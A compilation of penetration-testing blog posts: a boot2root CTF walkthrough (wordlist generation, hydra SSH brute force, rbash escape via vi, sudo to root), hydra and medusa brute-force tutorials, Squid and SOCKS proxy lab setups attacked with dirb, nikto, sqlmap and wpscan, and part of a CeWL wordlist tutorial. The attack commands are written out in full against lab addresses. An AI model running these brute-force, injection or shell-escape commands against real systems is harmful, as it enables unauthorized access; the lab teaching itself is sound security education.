Hacking Articles|Raj Chandel's Blog

Hello friends! Today we are going to take another boot2root challenge known as Matrix. The credit for making this vm machine goes to “Ajay Verma” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Flags: There is one flag (flag.txt).

Table of contents:

· Port scanning and IP discovery.

· Hitting on port 80

· Hitting on port 31337 and finding base64 encoded string

· Decode base64 encoded string

· Finding and downloading Bin file

· Decoding brainfuck encoded string

· Creating dictionary using crunch

· SSH login brute force using hydra

· Finding rbash

· Escaping restricted shell environment

· Exporting environment variables

· Getting root access.

· Reading the flags.

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.18

Our next step is to scan our target with nmap.

The NMAP output shows us that there are 4 ports open: 22(SSH), 80(HTTP), 31337(HTTP)

We find that port 80 is running http, so we open the IP in our browser.

We don’t find anything on the web service running on port 80. So we start enumerating the web service running on port 31337.

We take a look at the source code of the web service running on port 31337 and find a base64 encoded string.

We decode the base64 encoded string and find a hint to that is related “Cypher.matrix”.

We open “Cypher.matrix” on the web service running on port 31337 and find that it starts downloading a BIN file.

We take a look at the content of the file and find “brainfuck” encoded string.

We decode the brainfuck encoded string using this site here and find an incomplete password for the user “guest”.

As the last 2 characters are missing we create a wordlist using crunch so that we can brute force SSH login.

crunch 8 8 -t k1ll0r%@ -o dict.txt

We use hydra to brute force ssh login using the dictionary we created earlier and find the password to be “k1ll0r7n”.

hydra -l guest -P dict.txt 192.168.1.18 ssh

Now that we know the password we login through SSH using credentials “guest:k1ll0r7n”

ssh guest@192.168.1.18

After logging in we try to run “ls” command but are unable to run it as we have an rbash shell.

We check the PATH environment variable and find that the path to be “/home/guest/prog”.

$PATH

Now as we cannot run “ls” command we try to find commands that can run. After trying a few commands we find that we can run “echo” command. We use “echo” command to find the executables inside “/home/guest/prog” and find “vi” is available.

echo “/home/guest/prog/*”

Now we check SHELL environment variable and find we have only rbash shell.

echo $SHELL

We run vi so that we can spawn /bin/bash and escape the restricted shell environment.

!/bin/bash

After escaping the restricted shell environment, we export /bin/bash to SHELL environment variable and “/usr/bin” directory to PATH environment variable so that we can run linux command properly.

export SHELL=/bin/bash:$SHELL

export PATH=/usr/bin:$PATH

After exporting into the environment variables, we check sudoers list and find we can directly get root shell as we have all the rights.

sudo -l

sudo su

We are unable to execute “su” command as we haven’t exported “/bin” directory into PATH environment. We exported “/bin” directory into PATH environment variable and again ran the command to login as root using the password we find earlier.

export PATH=/bin:$PATH

sudo su

After logging in we go to root directory and find a file called flag.txt. We take a look at the content of the file and find the congratulatory message.

cd /root

cat flag.txt

Hello friends!! Today we are going to discuss - How much impactful hydra is in cracking login credential of various protocols to make unauthorized access to a system remotely. In this article we have discussed each option available in hydra to make brute force attack in various scenario.

Table of Content

§ Introduction to hydra

§ Multiple Feature of Hydra

§ Password Guessing For Specific Username

§ Username Guessing For Specific Password

§ Cracking Login Credential

§ Use Verbose or Debug Mode for Examining Brute Force

§ NULL/Same as Login/Reverse login Attempt

§ Save Output to Disk

§ Resuming The Brute Force Attack

§ Password Generating Using Various Set of Character

§ Attacking on Specific Port Instead of Default

§ Making Brute Force Attack on Multiple Host

Introduction to Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Multiple Feature of Hydra

Since we are using GNOME build of Kali Linux therefore the “thc-hydra” package is already included by default, all we need to do, open the terminal and just type “hydra -h” and press Enter. You will welcome by its help screen.

-R : restore a previous aborted/crashed session

-I : ignore an existing restore file.

-S : perform an SSL connect

-s : PORT if the service is on a different default port, define it here

-l LOGIN or -L : FILE login with LOGIN name, or load several logins from FILE

-p PASS or -P : FILE try password PASS, or load several passwords from FILE

-x MIN:MAX:CHARSET : password bruteforce generation, type "-x -h" to get help

-e nsr : try "n" null password, "s" login as pass and/or "r" reversed login

-u : loop around users, not passwords (effective! implied with -x)

-C FILE : colon separated "login:pass" format, instead of -L/-P options

-M FILE : list of servers to be attacked in parallel, one entry per line

-o FILE : write found login/password pairs to FILE instead of stdout

-f / -F : exit when a login/pass pair is found (-M: -f per host, -F global)

-t TASKS : run TASKS number of connects in parallel (per host, default: 16)

-w / -W TIME : wait time for responses (32s) / between connects per thread

-4 / -6 : prefer IPv4 (default) or IPv6 addresses

-v / -V / -d : verbose mode / show login+pass for each attempt / debug mode

-U : service module usage details

server : the target server (use either this OR the -M option)

service : the service to crack (see below for supported protocols)

OPT : some service modules support additional input (-U for module help)

Reference Source:https://tools.kali.org/password-attacks/hydra

Password Guessing For Specific Username

Hydra is very impactful tool and also quit easy to use for making brute force attack on any protocol.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

Suppose you want to crack password for ftp (or any other) whose username is with you, you only wish to make a password brute force attack by using a dictionary to guess the valid password.

At that moment you should go with following command where -l option enables username parameter and -P options enable dictionary for password list.

hydra -l raj -P pass.txt 192.168.1.108 ftp

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Username Guessing For Specific Password

Suppose you want to crack username for ftp (or any other) whose password is with you, you only wish to make a username brute force attack by using a dictionary to guess the valid username. Hence it is vice-versa situation compare to above situation.

At that moment you should go with following command where -L option enables dictionary for username list and -P options enable password parameter.

hydra -L user.txt -p 123 192.168.1.108 ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Cracking Login Credential

Suppose you want to crack username and password for ftp (or any other), wish to make username and password brute force attack by using dictionary to guess the valid combination

At that moment you should go with following command where -L option enables dictionary for username list and - P optionsenables dictionary for password list.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Use Verbose or Debug Mode for Examining Brute Force

You can use -V optionalong with each command, with the help of verbose mode you can observe the each attempt for matching valid combination of username and password. If you will observe the given below image then you will find there are 5 username in user.txt file (L=5) and 5 passwords in pass.txt file (P=5) and hence the total number of login attempt will be 5*5=25.

Even you can use -d option that enables debug and verbose mode together and shows complete detail of attacking mode.

As you can observe the verbose mode is showing each attempt for matching valid credential for username and password with the help of user.txt and pass.txt as well as debug mode is showing waittime, conwait, socket, send pid and received pid

NULL/Same as Login/Reverse login Attempt

Using option -e along with nsr enables three parameter null/same as login/reverse login while making brute force attack on password field, if you will observe the given below image then you will notice that, this time L=5 and automatically P=8 which means now the total number of login tries will be 5*8=40.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -V -e nsr

As you can observe with every username, it is trying to match the following combination along with the password list.

Save Output to Disk

For the purpose of the record maintenance, better readability and future references, we save the output of the hydra brute force attack onto a file. To this we will use the parameter -o of the hydra to save the output in a text file.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -o result.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case our location for output is /root /output.txt.

Resuming the Brute Force Attack

Sometime while making brute force, the attack get paused/halt or cancel accidently at this moment to save your time you can use -r option that enables resume parameter and continue the brute-forcing from the last dropped attempt of the dictionary instead of starting it from 1^st attempt.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp

hydra -R

Now you can observe the output result from the given below image where after pressing ctrl C it stop the attack and then type hydra -R to resume the attack and continue it.

Password Generating Using Various Set of Character

Hydra has -x option that enables password generation option that involves following instructions:

-x MIN:MAX:CHARSET

MIN is use to specify the minimum number of characters in the password

MAX is use to specify the maximum number of characters in the password

CHARSET is use to specify a specification of the characters to use in the generation valid CHARSET values are: 'a' for lowercase letters, 'A' for uppercase letters, '1' for numbers, and for all others, just add their real representation.

-y disable the use if the above letters as placeholders

Now suppose we want to try 123 as password for that I should set MIN=1, MAX=3 CHARSET 1 for generating numeric password for given username and run following command as said.

hydra -l shubham -x 1:3:1 ftp://192.168.1.108

hydra -l raj -x 1:3:1 192.168.1.108 ftp

hydra -l raj -x 1:3:1 192.168.1.108 ftp -y

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Now suppose we want to try 123 as password for that I should set MIN=1, MAX=3 CHARSET 1 for generating numeric password for given username and run following command as said.

hydra -l shubham -x 1:3:a ftp://192.168.1.108 -V

As you can observe it has found 1 valid password: abc for username: shubham for FTP login.

Attacking on Specific Port Instead of Default

Due to security concern the network admin change the port number of a service on another port. Hydra makes brute force attack on default port of a service as you can observe in above all attacks it has automatically making attack on port 21 for FTP login.

But you can use -s option that enables specific port number parameter and launch the attack on mention port instead of default port number.

Suppose on scanning the target network I found FTP is running port 2121 instead of 21 therefore I will execute following command for ftp login attack.

hydra -L user.txt -P pass.txt 192.168.1.108 ftp -s 2121

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Making Brute Force Attack on Multiple Host

If you want to use a user-pass dictionary on multiple host in a network then you can use -M option that enables the host list parameter and make brute force attack using same dictionary and will try same number of login attempt on each HOST IP mention in the host list.

Here you can observe I had saved two host IP in a text file and then use following command to make brute force attack on multiple host by using same dictionary.

hydra -L user.txt -P pass.txt -M hosts.txt ftp

As you can observe it has found 2 valid FTP logins on each Host.

Suppose you had given a list of multiple targets and wish to finish the brute force attack as soon as it found valid login for any host IP, then you should use -F options which enable finish parameter when found valid credential for either host from inside the host list.

hydra -L user.txt -P pass.txt -M hosts.txt ftp -V -F

As you can observe it has found 1 valid FTP logins for 192.168.1.108 and finish the attack.

Disclaimer by Hydra - Please do not use in military or secret service organizations, or for illegal purposes.

Hello friends!! Today we are going to discuss - How much impactful Medusa is in cracking login credential of various protocols to make unauthorized access to a system remotely. In this article we have discussed each option available in Medusa to make brute force attack in various scenario.

Table OF Content

Introduction to Medusa and its features

Password Cracking For Specific Username

Username Cracking for Specific Password

Cracking Login Credential

Making Brute Force Attack on Multiple Host

Attacking on Specific Port Instead of Default

NULL/Same as Login Attempt

Save logs to Disk

Stop on Success

Suppress Startup Banner

Verbose Mode

Error Debugging Mode

Using Combo Entries

Resuming the Brute Force Attack

Introduction to Medusa and its features

Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

§ Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.

§ Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.

§ Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

§ Multiple protocols supported. Many services are currently supported (e.g. SMB, HTTP, POP3, MS-SQL, SSHv2, among others)

Reference Source:http://www.foofus.net]

Type "medusa" in the terminal without any options, it will dump all the available options it accepts along with their respective description.

Syntax:Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h [TEXT] : Target hostname or IP address

-H [FILE] : File containing target hostnames or IP addresses

-u [TEXT] : Username to test

-U [FILE] : File containing usernames to test

-p [TEXT] : Password to test

-P [FILE] : File containing passwords to test

-C [FILE] : File containing combo entries. See README for more information.

-O [FILE] : File to append log information to

-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)

-M [TEXT] : Name of the module to execute (without the .mod extension)

-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a

different parameter each time and they will all be sent to the module (i.e.

-m Param1 -m Param2, etc.)

-d : Dump all known modules

-n [NUM] : Use for non-default TCP port number

-s : Enable SSL

-g [NUM] : Give up after trying to connect for NUM seconds (default 3)

-r [NUM] : Sleep NUM seconds between retry attempts (default 3)

-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).

-t [NUM] : Total number of logins to be tested concurrently

-T [NUM] : Total number of hosts to be tested concurrently

-L : Parallelize logins using one username per thread. The default is to process

the entire username before proceeding.

-f : Stop scanning host after first valid username/password found.

-F : Stop audit after first valid username/password found on any host.

-b : Suppress startup banner

-q : Display module's usage information

-v [NUM] : Verbose level [0 - 6 (more)]

-w [NUM] : Error debug level [0 - 10 (more)]

-V : Display version

-Z [TEXT] : Resume scan based on map of previous scan

As said above medusa is a brute forcing tool and you can use -d option to identify all available modules it contains.

Password Cracking For Specific Username

Medusa is very impactful tool and also quit easy to use for making brute force attack on any protocol.

Assume you want to crack password for ftp (or any other) whose username is with you, you only wish to make a password brute force attack by using a dictionary to guess the valid password.

At that moment you should go with following command where -u option enables username parameter and -P options enable dictionary for password list.

medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp

As you can observe it has found 1 valid password: 123 for username: raj for FTP login.

Username Cracking for Specific Password

Assume you want to crack username for ftp (or any other) whose password is with you, you only wish to make a username brute force attack by using a dictionary to guess the valid username. Hence it is vice-versa situation compare to above situation.

At that moment you should go with following command where -U option enables dictionary for username list and -p options enable password parameter.

medusa -h 192.168.1.108 -U user.txt -p 123 -M ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Cracking Login Credential

Suppose you want to crack username and password for ftp (or any other), wish to make username and password brute force attack by using dictionary to guess the valid combination

At that moment you should go with following command where -U option enables dictionary for username list and - P optionsenables dictionary for password list.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

As you can observe it has found 1 valid username: raj for password: 123 FTP login.

Making Brute Force Attack on Multiple Host

Here you can observe I had saved two host IP in a text file and then use following command to make brute force attack on multiple host by using same dictionary.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp

As you can observe it has found 2 valid FTP logins on each Host.

If you have multiple host IP in your host list and you want to make brute force attack only few number of host then use -T option for total number of hosts to be tested concurrently.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 2

As you can observe from given below the 1^stcommand make brute force attack on single Host IP where as in 2^ndcommand it is making brute force attack on two host IP simultaneously.

Attacking on Specific Port Instead of Default

Due to security concern the network admin change the port number of a service on another port. Medusa makes brute force attack on default port of a service as you can observe in above all attacks it has automatically making attack on port 21 for ftp login.

But you can use -n option that enables specific port number parameter and launch the attack on mention port instead of default port number.

Suppose on scanning the target network I found SSH is running port 2222 instead of 22 therefore I will execute following command for ssh login attack.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh -n 2222

As you can observe, in 1^st command of medusa it fail to connect on ssh as port 22 was close and it has found 1 valid password: 123 for username: raj for SSH login @ port 2222.

NULL/Same as Login Attempt

Using option -e along with ns enables three parameter null/same as login while making brute force attack on password field.

medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp -e ns

As you can observe with every username, it is trying to match the following combination along with the password list.

User “raj” and password “” as null password

User “raj” and password “raj” as same as login

Save logs to Disk

For the purpose of the record maintenance, better readability and future references, we save the output of the Medusa brute force attack onto a file. To this we will use the parameter -o of the medusa to save the output in a text file.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -o log.txt

Stop on Success

Supoose while using host list you want to Stop brute force attack on host after first valid username/password found then you can use -f option alone with command.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -f

Even you can use -F option to Stop audit after first valid username/password found on any host in your command.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -F

Suppress Startup Banner

If you want to hide banner of medusa while making brute force attack then use -b option to Suppress startup banner.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -b

Verbose Mode

There are six levels for verbose mode for examine the attack details and also contain error debug option that contain ten level for debug mode. You can use -v optionfor verbose parameter and -w option for error debugging parameter.

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 1

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 2

medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 6

Error Debugging Mode

As said above there are level from 0-10 for examining brute force attack at each level, here you will observe the result of 0-6 is approx. same with little difference and result from of level 7-10 is approx. same but varied from 0-6 level.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 01

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 06

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 07

Debug mode is showing waittime, socket, send data size and received data size, module detail and path.

Using Combo Entries

Using -c optionenables combo file parameter, the combo file should have one record per line and have the values colon separated in the format host_IP:username:password. If any of the three fields are left blank, the respective information should be delivered either as a global value or as a list in a file.

The following combinations are possible in the combo file:

host:username:password

host:username:

host::-

:username:password

:username:

::password

host::password

As you can observe in the given below image, we have userpass.txt file as our combo file format and we can use it along -C option to launch brute force attack.

medusa -M ftp -C userpass.txt

Resuming the Brute Force Attack

Sometime while making brute force, the attack get paused/halt or cancel accidently at this moment to save your time you can use -z option that enables resume parameter and continue the brute-forcing from the last dropped attempt of the dictionary instead of starting it from 1^st attempt.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp

Now you can observe the output result from the given below image where after pressing ctrl C it stop the attack and then add the highlighted text in your command to resume the attack and continue it.

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u2u3.

Repeat same as above, now compare the result after executing all three command you will notice it has continue the brute-forcing from the last dropped attempt

medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u3u4.

In this article we are going to setup Squid server to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.

Table of content

§ Introduction to Proxy Setting

§ Squid Proxy Installation

§ Squid Proxy Server Configuration

§ Configuring Apache service for Web Proxy

§ Set-up Manual Proxy in the Browser

§ Directory Brute force Attack on Proxy Server Using DIRB Tool

§ Vulnerability Scanning on Proxy Server Using Nikto Tool

§ SQL Injection on Proxy Server Using Sqlmap Tool

§ WordPress Scanning on Proxy Server Using WPScan Tool

Introduction to Proxy Setting

A proxy is a computer system or program which acts as a kind of middle-man that allow an intermediary to come between your web browser and another computer. Your ISP operates servers– computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.

For Example:Two users say A and B has requested to access same website of the server then Instead of retrieving the data from the original server, the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.

Squid Proxy Installation

Squid is a cross functional web proxy cache server application which offers proxy and cache services for HTTP, FTP, and other common network protocols such as proxying of Secure Sockets Layer (SSL) requests and caching of Domain Name Server (DNS) lookups, and implement transparent caching. Moreover it also maintains a wide variety of caching protocols.

Open the host file in your local machine to add localhost address and hostname, because by default squid3 search for Ubuntu as hostname for connection implementation.

Now use apt Repository to install squid3 and enter following command.

apt-get install squid3

Squid Proxy Server Configuration

Once it the installation completed, open its configuration file from the given path: /etc/squid3/squid.conf

With Squid's access control, you may possibly shape use of Internet services proxy by Squid to be accessible only employers with specific IP addresses.

Suppose you want to grant access by users of the 192.168.1.0/24 subnetwork only, then add the following line to the ACL section of the squid.conf file:

acl lan src 192.168.1.0/24

Now give permission to your clients to access HTTP service over local network.

http_access allow lan

To set your Squid server to listen on the default TCP port 3128, change the http_port directive as such:

http_port 3128

Add following roles for squid after adding HTTP_Port

request_header_access Referer deny all

request_header_access X-Forwarded-For deny all

request_header_access Via deny all

request_header_access Cache-Control deny all

You can Set forwarded_for :- on|off|transparent|truncate|delete

1. If set to "on", Squid will append your client's IP address in the HTTP requests it forwards. By default it looks like:

X-Forwarded-For: 192.1.2.3

2. If set to "off", it will appear as

X-Forwarded-For: unknown

3. If set to "transparent", Squid will not alter the

X-Forwarded-For header in any way.

4. If set to "delete", Squid will delete the entire

X-Forwarded-For header.

5. If set to "truncate", Squid will remove all existing

Here we had set forwarded_for off and save the file, then use the following command to restart the Squid Proxy.

sudo service squid3 restart

Configuring Apache service for Web Proxy

Now open the “000-default.conf” file from the path: /etc/apache2/sites-available/ and add following line to implement following rules on /html directory for localhost or Machine IP (192.168.1.103)

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order deny,allow

deny from all

allow from 127.0.0.1 192.168.1.103

Now the save the file and restart the apache service with help of following command.

service apache2 start

Now when some try access http service of our network i.e. 192.168.1.103, he/she will welcome by following web page

“Error 403 Forbidden- You don’t have permission to access ”.

When you face such type of situation where port 80 is open but you are unable to access it, hence proved the network is running behind proxy server.

Set-up Manual Proxy in the Browser

Now to test whether our proxy server is working or not by configuring , let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings and then select“Manual proxy configuration” and enter proxy server IP address (192.168.1.103) and Port (3128) to be used for all protocol.

BOOMMM!! Connected to Proxy server successfully using HTTP Proxy in our Browser.

Directory Brute force Attack on Proxy Server Using DIRB Tool

While making directory brute force attack via DIRB we can use –p option, it enables proxy URL to be used for all requests, by default it works on port 1080. As you have observe, on exploring target network IP in the web browser it put up “Access forbidden error” which means this web page is running behind some proxy.

dirb http://192.168.1.103

dirb http://192.168.1.103 –p 192.168.1.103:3128

From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtain any directory or file on executing 1st command where as in 2^nd command executed successfully.

Vulnerability Scanning on Proxy Server Using Nikto Tool

Similarly while scanning any network running behind proxy server, we can use -useproxy optionto scan the vulnerability.

nikto -h 192.168.1.103

nikto -h 192.168.1.103 -useproxy http://192.168.1.103:3128

From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtain any result on executing 1st command where as in 2^nd command executed successfully.

SQL Injection on Proxy Server Using Sqlmap Tool

As you have observe, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.

sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs

Hence we can use --proxy options to connect to the target URL, therefore execute following command:

sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs --proxy http://192.168.1.103:3128

Now from the given below image you can observe that we have successfully retrieve database name by exploiting SQL injection vulnerability.

WordPress Scanning on Proxy Server Using WPScan Tool

As you have observe, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.

wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content

Hence we can use --proxy options to connect to the target URL, therefore execute the following command:

wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content --proxy http://192.168.1.103:3128

Hopefully, you have found this article very helpful and completely understood the working of Proxy server and other related topic cover in this article.

Socks Proxy Penetration Lab Setup using Microsocks

Hello friends!! In our previous article we have disccuss “Web Proxy Penetration Lab Setup Testing using Squid” and today’s article we are going to setup SOCKS Proxy to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.

Table of Content

· Intoduction to proxy

· What is socks proxy

· Difference Between Socks proxy and HTTP Proxy

· Socks proxy Installation

· Web Proxy Penetration Testing

· SSH Proxy Penetration Testing

· FTP Proxy Penetration Testing

Intoduction to Proxy

A proxy is a computer system or program that acts as a kind of middle-man or an intermediary to come between your web browser and another computer. Your ISP operates servers– computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.

For Example:Two users say A and B both has requested to access same website of the server then Instead of retrieving the data from the original server, the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.

What is SOCKS Proxy?

A SOCKS server is a all-purpose proxy server that creates a TCP connection to another server on the client’s behalf, then exchanges network packets between a client and server. The Tor onion proxy software serves a SOCKS interface to its clients. Even SSH tunnel makes all the connections as per the SOCKS protocol.

For high security you can go with SOCKS5 protocol that provides various authentication options which you cannot get with the SOCKS4 protocol.

Difference Between Socks proxy and HTTP Proxy

§ SOCKS Proxy is low-level which is designed to be an general proxy that will be able to accommodate effectively any protocol, program, or type of traffic.

§ SOCKS proxies support both TCP and UDP transfer protocols

§ SOCKS performs at Layer 5 of the OSI model SOCKS server

§ Accepts incoming client connection on TCP port 1080.

§ HTTP proxies proxy HTTP requests, while SOCKS proxies proxy socket connections

§ HTTP proxies is High-Level which are designed for a specific protocol.

§ HTTP proxies can only process requests from applications that use the HTTP protocol.

§ An HTTP proxy is for proxying HTTP or web traffic at layer 7

§ Accepts incoming client connection on HTTP port 3128.

Socks Proxy Installation

For socks proxy lab set-up we are going to download microsocks through github. MicroSocks is multithreaded, small, efficient SOCKS5 server. It's very lightweight, and very light on resources too. Even for every client, a thread with a stack size of 8KB is spawned.

Lest’s start!!

Open the terminal with sudo rights and enter the following command:

git clone https://github.com/rofl0r/microsocks.git

Once downloading is completed run the following command for its installation:

cd microsocks

make

make install

Now execute the following command to run socks proxy on port 1080 without authentication.

microsocks -p 1080

As you can observe FTP, SSH, HTTP and Socks is running in our local machine and now let’s go for socks penetration testing on various protocol to ensure whether it is all-purpose program or not as said above.

Web Proxy Penetration Testing

Now Configuring Apache service for Web Proxy, therefore, open the “000-default.conf” file from the path: /etc/apache2/sites-available/ and add following line to implement the following rules on /html directory over localhost or Machine IP (192.168.1.103).

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order deny,allow

deny from all

allow from 127.0.0.1 192.168.1.103

Now the save the file and restart the apache service with the help of following command.

service apache2 start

Now when someone try to access web services through our network i.e. 192.168.1.103, he/she will welcome by following web page

“Error 403 Forbidden- You don’t have permission to access ”.

When you face such type of situation where port 80 is open but you are unable to access it, hence proved the network is running behind proxy server.

For web Proxy penetration testing we had already set-up lab for web application server such as DVWA (Read Article from here).

Now to test whether our proxy server is working or not by configuring , let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings and then select “Manual proxy configuration” and enter SOCKS proxy server IP address (192.168.1.103) and Port (1080) to be used for all protocol.

BOOMMM!! Connected to Proxy server successfully using HTTP Proxy in our Browser.

SSH Proxy Penetration Testing

Now configuring host.allow file for SSH Proxy therefore open /etc/host.allow file and following line to allow SSH connection on localhost IP and restrict for others.

sshd : localhost : allow

sshd : 192.168.1.103: allow

sshd : ALL: deny

Now open proxychains configuration file from the given path /etc/proxychains.conf in your kali Linux and then add following line at the bottom.

socks5 192.168.1.103 1080

Now when we try to connect with target machine via port 22 for SSH connection we got an error message “Connection reset by peer” as shown in below image after executing 1^st command.

ssh pentest@192.168.1.103

When you face such type of situation where port 22 is open but you are unable to access it, hence proved the network is running behind proxy server.

But if you will use proxychains along with the command after saving the configuration as said above then you can easily connect with target network via port 22 for ssh connection as shown in below image after executing 2^nd command.

proxychainsssh pentest@192.168.1.103

FTP Proxy Penetration Testing

Now configuring vsftpd.conf file for FTP Proxy therefore open /etc/vsftpd.conf file and add thefollowing line to allow FTP connection on localhost IP and restrict for others networks.

Order Allow, Deny

Allow from 127.0.0.1 192.168.1.103

Deny from all

Using fileZilla when we try to connect 192.168.1.103 via port 21 for accessing FTP service, we got an Error “Connection closed by server”.

When you face such type of situation where port 21 is open but you are unable to access it, hence proved the network is running behind proxy server.

But FileZilla has multi features as it offers generic proxy option that forced passive mode on FTP connection. Go to Settings > Connection > FTP and select “generic proxy” option and made the following configuration settings.

§ Choose SOCKS 5 as generic Proxy

§ Proxy HOST IP: 192.168.1.103

§ Proxy Port: 1080

Now again when you will try to connect the target machine via port 21 for accessing FTP service then you will be easily able to access it as shown in the last image.

Hence Proved the SOCKS is actually all-purpose proxy server and Hopefully, you have found this article very helpful and completely understood the working of Proxy server and other related topic cover in this article.

Hello Friends!! In this article we are focusing on Generating Wordlist using Kali Linux tool Cewl and learn more about its available options.

Table of Content

§ Introduction to Cewl

§ Default Method

§ Save Wordlist in a file

§ Generating Wordlist of Specific Length

§ Retrieving Emails from a Website

§ Count the number of Word Repeated in a website

§ Increase the Depth to Spider

§ Extra Debug Information

§ Verbose Mode

§ Generating Alpha-Numeric

§ Cewl with Digest/Basic Authentication

§ Proxy URL

Introduction to Cewl

CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded.

Source :https://tools.kali.org/password-attacks/cewl

Type “cewl -h” in the terminal, it will dump all the available options it accepts along with their respective description.

SYNTAX: cewl [options]

Genral Options

-h, --help: Show help.

-k, --keep: Keep the downloaded file.

-d ,--depth : Depth to spider to, default 2.

-m, --min_word_length: Minimum word length, default 3.

-o, --offsite: Let the spider visit other sites.

-w, --write: Write the output to the file.

-u, --ua : User agent to send.

-n, --no-words: Don't output the wordlist.

--with-numbers: Accept words with numbers in as well as just letters

-a, --meta: include meta data.

--meta_file file: Output file for Meta data.

-e, --email: Include email addresses.

--email_file : Output file for email addresses.

--meta-temp-dir
: The temporary directory used by exiftool when parsing files, default /tmp.

-c, --count: Show the count for each word found.

-v, --verbose: Verbose.

--debug: Extra debug information.

Authentication

--auth_type: Digest or basic.

--auth_user: Authentication username.

--auth_pass: Authentication password.

Proxy Support

--proxy_host: Proxy host.

--proxy_port: Proxy port, default 8080.

--proxy_username: Username for proxy, if required.

--proxy_password: Password for proxy, if required.

Default Method

Enter the following command which spiders the given url to a specified depth and print a list of words which can then be used as dictionary for cracking password.

cewl http://www.ignitetechnologies.in/

Save Wordlist in a file

For the purpose of the record maintenance, better readability and future references, we save the print list of word onto a file. To this we will use the parameter -wto save the output in a text file.

cewl http://www.ignitetechnologies.in/ -w dict.txt

cat dict.txt

Generating Wordlist of Specific Length

If you want to generate wordlist of a specific word length then use -m option as it enables minimum words limit parameter.

